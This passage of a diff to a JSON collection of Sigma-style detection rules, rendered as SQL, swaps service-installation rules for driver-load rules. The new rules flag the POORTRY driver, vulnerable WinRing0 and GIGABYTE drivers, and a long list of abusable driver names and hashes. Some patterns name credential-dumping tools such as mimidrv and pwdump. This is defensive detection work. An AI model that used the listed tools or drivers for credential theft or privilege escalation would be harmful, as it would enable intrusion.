ESCAPE '\\')" ], - "filename": "win_system_apt_carbonpaper_turla.yml" + "filename": "driver_load_win_powershell_script_installed_as_service.yml" }, { - "title": "Potential RDP Exploit CVE-2019-0708", - "id": "aaa5b30d-f418-420b-83a0-299cb6024885", - "status": "test", - "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", - "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", + "title": "Usage Of Malicious POORTRY Signed Driver", + "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "status": "experimental", + "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.privilege_escalation", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Bad connections or network interruptions" + "Legitimate BIOS driver updates (should be rare)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('56', '50') AND Provider_Name = 'TermDD')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a'))" ], - "filename": "win_system_rdp_potential_cve_2019_0708.yml" + "filename": "driver_load_win_mal_poortry_driver.yml" }, { - "title": "Credential Dumping Tools Service Execution - System", - "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", - "status": "experimental", + "title": "Credential Dumping Tools Service Execution", + "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "status": "test", "description": "Detects well-known credential dumping tools execution via service execution events", "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ @@ -3821,351 +3745,231 @@ "falsepositives": [ "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" - ], - "filename": "win_system_mal_creddumper.yml" - }, - { - "title": "Zerologon Exploitation Using Well-known Tools", - "id": "18f37338-b9bd-4117-a039-280c81f7a596", - "status": "stable", - "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", - "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", - "tags": [ - "attack.t1210", - "attack.lateral_movement" - ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\')" ], - "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + "filename": "driver_load_win_mal_creddumper.yml" }, { - "title": "New Service Uses Double Ampersand in Path", - "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "title": "Vulnerable WinRing0 Driver Load", + "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", "status": "experimental", - "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7')" ], - "filename": "win_system_service_install_susp_double_ampersand.yml" + "filename": "driver_load_win_vuln_winring0_driver.yml" }, { - "title": "Service Installed By Unusual Client - System", - "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "title": "Vulnerable GIGABYTE Driver Load", + "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" - ], - "filename": "win_system_system_service_installation_by_unusal_client.yml" - }, - { - "title": "Anydesk Remote Access Software Service Installation", - "id": "530a6faa-ff3d-4022-b315-50828e77eef5", - "status": "experimental", - "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence" - ], - "falsepositives": [ - "Legitimate usage of the anydesk tool" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'AnyDesk Service')" - ], - "filename": "win_system_service_install_anydesk.yml" - }, - { - "title": "Remote Access Tool Services Have Been Installed - System", - "id": "1a31b18a-f00c-4061-9900-f735b96c99fc", - "status": "experimental", - "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", - "author": "Connor Martin, Nasreddine Bencherchali", - "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1569.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036') AND (ServiceName LIKE '%SSUService%' ESCAPE '\\' OR ServiceName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceName LIKE '%Atera%' ESCAPE '\\' OR ServiceName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceName LIKE '%RPCService%' ESCAPE '\\' OR ServiceName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceName LIKE '%monblanking%' ESCAPE '\\' OR ServiceName LIKE '%RManService%' ESCAPE '\\' OR ServiceName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceName LIKE '%vncserver%' ESCAPE '\\' OR ServiceName LIKE '%Parsec%' ESCAPE '\\' OR ServiceName LIKE '%chromoting%' ESCAPE '\\' OR ServiceName LIKE '%Zoho%' ESCAPE '\\' OR ServiceName LIKE '%jumpcloud%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b'))" ], - "filename": "win_system_service_install_remote_access_software.yml" + "filename": "driver_load_win_vuln_gigabyte_driver.yml" }, { - "title": "New PDQDeploy Service - Server Side", - "id": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "title": "Vulnerable Driver Load By Name", + "id": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", "status": "experimental", - "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", + "description": "Detects the load of known vulnerable drivers via their names only.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ - "Legitimate use of the tool" + "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", + "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployService.exe%' ESCAPE '\\' OR ServiceName IN ('PDQDeploy', 'PDQ Deploy')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\mtcbsv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_def64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gameink.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\81.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_rcio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sense5ext.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gvcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86-withoutdbg.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atillk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lurker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\segwindrvx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\enetechio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inpoutx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows8-10-32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\corsairllaccess64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winflash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\paniox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\blackbonedrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fiddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutildrv2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\my.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wyproxy64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ni.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_i2cio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\protects.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proxy32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netproxydriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_hwmio64\\_w10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\physmem.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrsmartconnectdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\monitor\\_win10\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amdryzenmasterdriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandra.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmix64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_i2c64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_rcio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zam64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncpl.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nchgbios2x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bwrsh.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lha.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntbios.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\blacklotus\\_driver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ucorew64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwos2ec7x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows7-32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv106.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elbycdio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asupio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\otipcibus.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows-xp-64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswarpot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amdpowerprofiler.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tgsafe.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntiolib\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrrapidstartdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwos2ec10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viraglt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lv561av.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nscm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\c.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asribdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eneio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\80.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iobitunlocker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zamguard64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nstrwsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wiseunlo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_hwmio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hostnt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\glckio2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hpportiox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\citmdrv\\_amd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kevp64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmixp64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nbiolib\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\full.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflash.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtcore64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\speedfan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwrwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msrhook.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proxy64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hw\\_sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bandai.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t8.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adv64drv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrsetupdrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bwrs.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fiddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\goad.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gametersafe.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lenovodiagnosticsdriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netflt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bw.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntbios\\_2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dh\\_kernel.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow8x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\superbmc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nodedriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz141.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dh\\_kernel\\_10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\naldrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winiodrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asmmap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_namco.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iqvw64e.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nstr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntiolib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pciecubed.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vmdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atszio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\agent64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpupress.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\krpocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv102.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswvmm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tmcomm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_def.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmi.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\alsysio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amifldrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\testbone.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64c.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\se64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\air\\_system10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcpu.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kbdcap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lctka.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflsh64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phlashnt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atszio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil\\_2\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_4.sys' 